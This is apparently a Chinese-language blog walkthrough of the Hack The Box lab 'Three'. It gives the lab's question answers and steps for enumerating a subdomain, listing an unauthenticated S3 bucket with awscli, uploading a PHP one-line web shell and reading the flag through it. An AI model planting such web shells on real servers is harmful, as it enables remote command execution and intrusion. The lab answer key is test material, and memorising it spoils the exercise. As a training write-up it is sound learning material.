HackBox---Three

# Three

# 一、问题
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
How many TCP ports are open?
	2
What is the domain of the email address provided in the "Contact" section of the website?
	thetoppers.htb
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
	/etc/hosts
Which sub-domain is discovered during further enumeration?
	s3.thetoppers.htb
Which service is running on the discovered sub-domain?
	Amazon S3
Which command line utility can be used to interact with the service running on the discovered sub-domain?
	awscli
Which command is used to set up the AWS CLI installation?
	aws configure
What is the command used by the above utility to list all of the S3 buckets?
	aws s3 ls
This server is configured to run files written in what web scripting language?
	PHP
# 二、获取 Flag

先对靶机 IP 进行端口扫描查看开放哪些端口

image-20230211200724185

火狐浏览器访问该 IP 地址,在网页当中找到一个域名 thetoppers.htb

image-20230211200913528

使用 OneForAll 进行子域名爆破找到其中一个子域名 s3.thetoppers.htb

在没有 DNS 服务器的情况下,我们可以使用 Hosts 文件将主机名解析为 IP 地址,以便能够访问指向这些主机名的网站

1
2
echo '10.129.192.178 thetoppers.htb' >> /etc/hosts
echo '10.129.192.178 s3.thetoppers.htb' >> /etc/hosts
  • 浏览器访问 s3.thetoppers.htb

image-20230211205257478

  • 通过子域名爆破,得知该域名是使用亚马逊服务器,下载安装 aws
  • 使用 aws configure 进行配置

image-20230211220937436

查看所有 s3 的服务

1
aws --endpoint=http://s3.thetoppers.htb s3 ls

image-20230211221044821

查看该 s3 下的目录及对象

1
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

image-20230211221152799

编写一句话木马,使用 cp 命令拷贝到 s3 的桶里,并查看结果

1
2
echo '<?php system($_GET["cmd"]); ?>' > shell.php
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

  • 使用 cmd=cat+../flag.txt 可以直接拿到 flag

  • http://thetoppers.htb/shell.php?cmd=cat+../flag.txt

靶场
#HackBox
HackBox---Three
https://rofgd.github.io/2022/11/21/HackBox-Three/
作者
ReadPond
发布于
2022年11月21日
许可协议